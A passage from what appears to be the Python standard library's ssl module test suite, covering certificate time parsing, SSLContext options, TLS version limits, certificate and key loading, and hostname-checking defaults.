@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = socket_helper.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
def test_read_write_zero(self):
# empty reads and writes now work, bpo-42854, bpo-31711
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.send(b""), 0)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.protocol, protocol)
with warnings_helper.check_warnings():
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT |
OP_IGNORE_UNEXPECTED_EOF)
self.assertEqual(default, ctx.options)
with warnings_helper.check_warnings():
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
with warnings_helper.check_warnings():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
def test_verify_mode_protocol(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@ignore_deprecation
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(
hasattr(ssl.SSLContext, 'security_level'),
"requires OpenSSL >= 1.1.0"
)
def test_security_level(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# The default security callback allows for levels between 0-5
# with OpenSSL defaulting to 1, however some vendors override the
# default value (e.g. Debian defaults to 2)
security_level_range = {
0,
1, # OpenSSL default
2, # Debian
3,
4,
5,
}
self.assertIn(ctx.security_level, security_level_range)
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
ctx.verify_flags = ssl.VERIFY_ALLOW_PROXY_CERTS
self.assertEqual(ctx.verify_flags, ssl.VERIFY_ALLOW_PROXY_CERTS)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(
ssl.SSLError,
"no start line: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(
ssl.SSLError,
"not enough data: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT',
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(
ssl.PROTOCOL_TLSv1_2,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True
)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1_2)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
def test_num_tickest(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
